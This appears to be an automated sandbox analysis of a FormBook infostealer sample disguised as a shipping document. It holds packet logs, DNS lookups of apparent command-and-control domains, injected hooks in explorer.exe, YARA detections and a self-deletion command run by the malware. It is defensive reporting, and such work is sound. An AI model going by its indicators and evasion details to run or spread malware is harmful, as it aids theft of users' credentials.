                                Nov 19, 2020 10:15:48.068938017 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.068953037 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.068985939 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.068994999 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.069025993 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.069034100 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.069046974 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.069060087 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.069065094 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.069087029 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.069096088 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.069129944 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.069173098 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.069181919 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.069190979 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.069206953 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.069222927 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.069237947 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.069242001 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.069272041 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.069284916 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.069317102 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.069317102 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.069363117 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.069365978 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.069380045 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.069396019 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.069406986 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.069473982 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.069490910 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.069492102 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.069504976 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.069535017 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.069566011 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.211714029 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.211755037 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.211796045 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.211822987 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.211846113 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.211848021 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.211889982 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.211906910 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.211952925 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.211954117 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.212008953 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.212011099 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.212049961 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.212053061 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.212088108 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.212126970 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.212136984 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.212184906 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.212217093 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.212240934 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.212282896 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.212291002 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.212333918 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.212404013 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.212449074 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.212454081 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.212497950 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.212564945 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.212605953 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.212613106 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.212665081 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.212685108 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.212733030 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.212778091 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.212848902 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.212852001 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.212888002 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.212893009 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.212914944 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.212935925 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.212935925 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.212964058 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.212989092 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.213049889 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.213104010 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.213125944 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.213166952 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.213170052 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.213211060 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.213284016 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.213316917 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.213340998 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.213361025 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.213365078 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.213406086 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.213411093 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.213442087 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.213469028 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.213491917 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.213491917 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.213516951 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.213532925 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.213552952 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.213583946 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.213606119 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.213645935 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.213684082 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.213738918 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.213747978 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.213773012 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.213794947 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.213802099 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.213850021 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.213852882 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.213879108 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.213897943 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.213901043 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.213937044 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.213968992 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.213994026 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.214016914 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.214040041 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.214061975 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.214085102 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.214149952 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.214174032 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.214199066 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.214236021 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.214288950 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.214314938 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.214338064 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.214361906 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.214365005 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.214389086 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.214400053 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.214436054 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.214443922 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.214483023 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.214529037 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.214565039 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.214580059 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.214589119 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.214613914 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.214617968 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.214637995 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.214654922 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.214662075 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.214684010 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.214699030 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.214724064 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.214751005 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.214777946 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.214802980 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.214826107 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.214828968 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.214848995 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.214853048 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.214874029 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:48.214883089 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:48.214915037 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:15:53.069120884 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:53.069148064 CET44349720192.185.170.106192.168.2.5
                                Nov 19, 2020 10:15:53.069514036 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:16:09.485778093 CET49720443192.168.2.5192.185.170.106
                                Nov 19, 2020 10:16:51.684283972 CET4972780192.168.2.5103.53.126.132
                                Nov 19, 2020 10:16:54.694101095 CET4972780192.168.2.5103.53.126.132
                                Nov 19, 2020 10:17:00.710282087 CET4972780192.168.2.5103.53.126.132

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Nov 19, 2020 10:14:57.672523022 CET5959653192.168.2.58.8.8.8
                                Nov 19, 2020 10:14:57.684814930 CET53595968.8.8.8192.168.2.5
                                Nov 19, 2020 10:14:58.504379988 CET6529653192.168.2.58.8.8.8
                                Nov 19, 2020 10:14:58.517632008 CET53652968.8.8.8192.168.2.5
                                Nov 19, 2020 10:14:59.227814913 CET6318353192.168.2.58.8.8.8
                                Nov 19, 2020 10:14:59.240803957 CET53631838.8.8.8192.168.2.5
                                Nov 19, 2020 10:15:00.080413103 CET6015153192.168.2.58.8.8.8
                                Nov 19, 2020 10:15:00.092885971 CET53601518.8.8.8192.168.2.5
                                Nov 19, 2020 10:15:03.358402014 CET5696953192.168.2.58.8.8.8
                                Nov 19, 2020 10:15:03.371630907 CET53569698.8.8.8192.168.2.5
                                Nov 19, 2020 10:15:04.305349112 CET5516153192.168.2.58.8.8.8
                                Nov 19, 2020 10:15:04.317756891 CET53551618.8.8.8192.168.2.5
                                Nov 19, 2020 10:15:06.250655890 CET5475753192.168.2.58.8.8.8
                                Nov 19, 2020 10:15:06.263612986 CET53547578.8.8.8192.168.2.5
                                Nov 19, 2020 10:15:20.313951015 CET4999253192.168.2.58.8.8.8
                                Nov 19, 2020 10:15:20.332675934 CET53499928.8.8.8192.168.2.5
                                Nov 19, 2020 10:15:22.679122925 CET6007553192.168.2.58.8.8.8
                                Nov 19, 2020 10:15:22.692229033 CET53600758.8.8.8192.168.2.5
                                Nov 19, 2020 10:15:46.817104101 CET5501653192.168.2.58.8.8.8
                                Nov 19, 2020 10:15:46.964602947 CET53550168.8.8.8192.168.2.5
                                Nov 19, 2020 10:15:47.210824013 CET6434553192.168.2.58.8.8.8
                                Nov 19, 2020 10:15:47.230686903 CET53643458.8.8.8192.168.2.5
                                Nov 19, 2020 10:15:47.268902063 CET5712853192.168.2.58.8.8.8
                                Nov 19, 2020 10:15:47.287764072 CET53571288.8.8.8192.168.2.5
                                Nov 19, 2020 10:15:47.325210094 CET5479153192.168.2.58.8.8.8
                                Nov 19, 2020 10:15:47.344552994 CET53547918.8.8.8192.168.2.5
                                Nov 19, 2020 10:15:47.786919117 CET5046353192.168.2.58.8.8.8
                                Nov 19, 2020 10:15:47.821305990 CET53504638.8.8.8192.168.2.5
                                Nov 19, 2020 10:16:23.870322943 CET5039453192.168.2.58.8.8.8
                                Nov 19, 2020 10:16:23.883050919 CET53503948.8.8.8192.168.2.5
                                Nov 19, 2020 10:16:24.474883080 CET5853053192.168.2.58.8.8.8
                                Nov 19, 2020 10:16:24.490516901 CET53585308.8.8.8192.168.2.5
                                Nov 19, 2020 10:16:50.356683969 CET5381353192.168.2.58.8.8.8
                                Nov 19, 2020 10:16:51.350296974 CET5381353192.168.2.58.8.8.8
                                Nov 19, 2020 10:16:51.677045107 CET53538138.8.8.8192.168.2.5
                                Nov 19, 2020 10:16:51.777789116 CET53538138.8.8.8192.168.2.5
                                Nov 19, 2020 10:17:14.765675068 CET6373253192.168.2.58.8.8.8
                                Nov 19, 2020 10:17:14.790375948 CET53637328.8.8.8192.168.2.5

                                ICMP Packets

                                TimestampSource IPDest IPChecksumCodeType
                                Nov 19, 2020 10:16:51.777946949 CET192.168.2.58.8.8.8d007(Port unreachable)Destination Unreachable

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                Nov 19, 2020 10:15:46.817104101 CET192.168.2.58.8.8.80x133dStandard query (0)lifeandhealth.com.mxA (IP address)IN (0x0001)
                                Nov 19, 2020 10:16:50.356683969 CET192.168.2.58.8.8.80x9784Standard query (0)www.baizhan180.xyzA (IP address)IN (0x0001)
                                Nov 19, 2020 10:16:51.350296974 CET192.168.2.58.8.8.80x9784Standard query (0)www.baizhan180.xyzA (IP address)IN (0x0001)
                                Nov 19, 2020 10:17:14.765675068 CET192.168.2.58.8.8.80xc6b1Standard query (0)www.algulmotors.comA (IP address)IN (0x0001)

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                Nov 19, 2020 10:15:46.964602947 CET8.8.8.8192.168.2.50x133dNo error (0)lifeandhealth.com.mx192.185.170.106A (IP address)IN (0x0001)
                                Nov 19, 2020 10:16:51.677045107 CET8.8.8.8192.168.2.50x9784No error (0)www.baizhan180.xyz103.53.126.132A (IP address)IN (0x0001)
                                Nov 19, 2020 10:16:51.777789116 CET8.8.8.8192.168.2.50x9784No error (0)www.baizhan180.xyz103.53.126.132A (IP address)IN (0x0001)
                                Nov 19, 2020 10:17:14.790375948 CET8.8.8.8192.168.2.50xc6b1No error (0)www.algulmotors.comalgulmotors.comCNAME (Canonical name)IN (0x0001)
                                Nov 19, 2020 10:17:14.790375948 CET8.8.8.8192.168.2.50xc6b1No error (0)algulmotors.com94.237.90.68A (IP address)IN (0x0001)

                                HTTPS Packets

                                TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                Nov 19, 2020 10:15:47.330766916 CET192.185.170.106443192.168.2.549720CN=webdisk.lifeandhealth.com.mx CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Fri Nov 06 17:15:38 CET 2020 Thu Mar 17 17:40:46 CET 2016Thu Feb 04 17:15:38 CET 2021 Wed Mar 17 17:40:46 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Thu Mar 17 17:40:46 CET 2016Wed Mar 17 17:40:46 CET 2021

                                Code Manipulations

                                User Modules

                                Hook Summary

                                Function NameHook TypeActive in Processes
                                PeekMessageAINLINEexplorer.exe
                                PeekMessageWINLINEexplorer.exe
                                GetMessageWINLINEexplorer.exe
                                GetMessageAINLINEexplorer.exe

                                Processes

                                Process: explorer.exe, Module: user32.dll
                                Function NameHook TypeNew Data
                                PeekMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xE0
                                PeekMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xE0
                                GetMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xE0
                                GetMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xE0

                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                Analysis Process: AWB# 9284730932.exe PID: 5536 Parent PID: 5604

                                General

                                Start time:10:15:02
                                Start date:19/11/2020
                                Path:C:\Users\user\Desktop\AWB# 9284730932.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\user\Desktop\AWB# 9284730932.exe'
                                Imagebase:0x400000
                                File size:86016 bytes
                                MD5 hash:E69D0C42F97A007FB131B35CB8A4D7B8
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:Visual Basic
                                Reputation:low

                                Chronological Activities

                                Analysis Process: AWB# 9284730932.exe PID: 6252 Parent PID: 5536

                                General

                                Start time:10:15:36
                                Start date:19/11/2020
                                Path:C:\Users\user\Desktop\AWB# 9284730932.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\user\Desktop\AWB# 9284730932.exe'
                                Imagebase:0x400000
                                File size:86016 bytes
                                MD5 hash:E69D0C42F97A007FB131B35CB8A4D7B8
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.373125113.000000001E150000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.373125113.000000001E150000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.373125113.000000001E150000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.373146227.000000001E180000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.373146227.000000001E180000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.373146227.000000001E180000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low

                                Chronological Activities

                                Analysis Process: explorer.exe PID: 3472 Parent PID: 6252

                                General

                                Start time:10:15:49
                                Start date:19/11/2020
                                Path:C:\Windows\explorer.exe
                                Wow64 process (32bit):false
                                Commandline:
                                Imagebase:0x7ff693d90000
                                File size:3933184 bytes
                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Chronological Activities

                                Analysis Process: cmd.exe PID: 6656 Parent PID: 3472

                                General

                                Start time:10:16:02
                                Start date:19/11/2020
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\cmd.exe
                                Imagebase:0x150000
                                File size:232960 bytes
                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000E.00000002.500985638.000000000025D000.00000004.00000020.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.501858309.0000000002F20000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.501858309.0000000002F20000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.501858309.0000000002F20000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000E.00000002.503105850.000000000383F000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.501396069.0000000000520000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.501396069.0000000000520000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.501396069.0000000000520000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:high

                                Chronological Activities

                                Analysis Process: cmd.exe PID: 6676 Parent PID: 6656

                                General

                                Start time:10:16:07
                                Start date:19/11/2020
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:/c del 'C:\Users\user\Desktop\AWB# 9284730932.exe'
                                Imagebase:0x150000
                                File size:232960 bytes
                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Chronological Activities

                                Analysis Process: conhost.exe PID: 6684 Parent PID: 6676

                                General

                                Start time:10:16:07
                                Start date:19/11/2020
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7ecfc0000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Chronological Activities

                                Disassembly

                                Code Analysis

                                Reset < >

                                  Analysis Process: AWB# 9284730932.exe PID: 5536 Parent PID: 5604 AWB# 9284730932.exeCOMMON

                                  Executed Functions

                                  Function 022D0A8B, Relevance: 13.2, APIs: 3, Strings: 4, Instructions: 993COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID: W.E$0$1.!T$+f
                                  • API String ID: 1029625771-1612752365
                                  • Opcode ID: 6307712330562ec547b59d1e45847d9b29d55eaf3a2b625d66255beaa16afb6d
                                  • Instruction ID: eba08cc336be2e629bfdb27caa7a4fac89affbb76df4b65c166896609dfe33d7
                                  • Opcode Fuzzy Hash: 6307712330562ec547b59d1e45847d9b29d55eaf3a2b625d66255beaa16afb6d
                                  • Instruction Fuzzy Hash: 7062DD74670306ABEF306EE4CD557EA3363AF02794F940129ED86AB1DCD7B5C486CA02
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D0782, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 119nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • EnumWindows.USER32(022D07E5,?,00000000,00000000), ref: 022D078C
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,022D090E,00000000,00000000,00000000), ref: 022D096D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: EnumInformationThreadWindows
                                  • String ID: 1.!T$+f
                                  • API String ID: 1954852945-2688641672
                                  • Opcode ID: 8bf1a7b4a0433c73ba101e48c0d47fa441a1cfd8a6a23df62bf40a190bf32f1d
                                  • Instruction ID: 02e98d13e9523ae26ad5c93347f3e467e304baa907041db3bb73d1b557c75749
                                  • Opcode Fuzzy Hash: 8bf1a7b4a0433c73ba101e48c0d47fa441a1cfd8a6a23df62bf40a190bf32f1d
                                  • Instruction Fuzzy Hash: AC31BF743A430A6AFF206EB08DA1BEB27A69F45790F804105FD869B2D8DBB0C945C952
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D4C71, Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 567libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,082962C8,000004A3,022D0876,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 022D7112
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.307724826.00000000022D0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID: 0
                                  • API String ID: 1029625771-4108050209
                                  • Opcode ID: e6b4e705fb954c953b3e7545decd1591d3251acf50c56ee0d7936aa6c4d842f8
                                  • Instruction ID: b7aa167265f6247c85ae4a1b1086fe1d916d5b6445da2dcacf925f0d847c9914
                                  • Opcode Fuzzy Hash: e6b4e705fb954c953b3e7545decd1591d3251acf50c56ee0d7936aa6c4d842f8
                                  • Instruction Fuzzy Hash: E8026870260306AEFF305EA4CD55BEA3622AF05790F90412AED86A71C8D7F588C6CF42
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022D23B6, Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 531nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022D6EA1: LoadLibraryA.KERNELBASE(?,082962C8,000004A3,022D0876,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 022D7112
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,022D090E,00000000,00000000,00000000), ref: 022D096D
                                  Strings
                                  Memory Dump Source
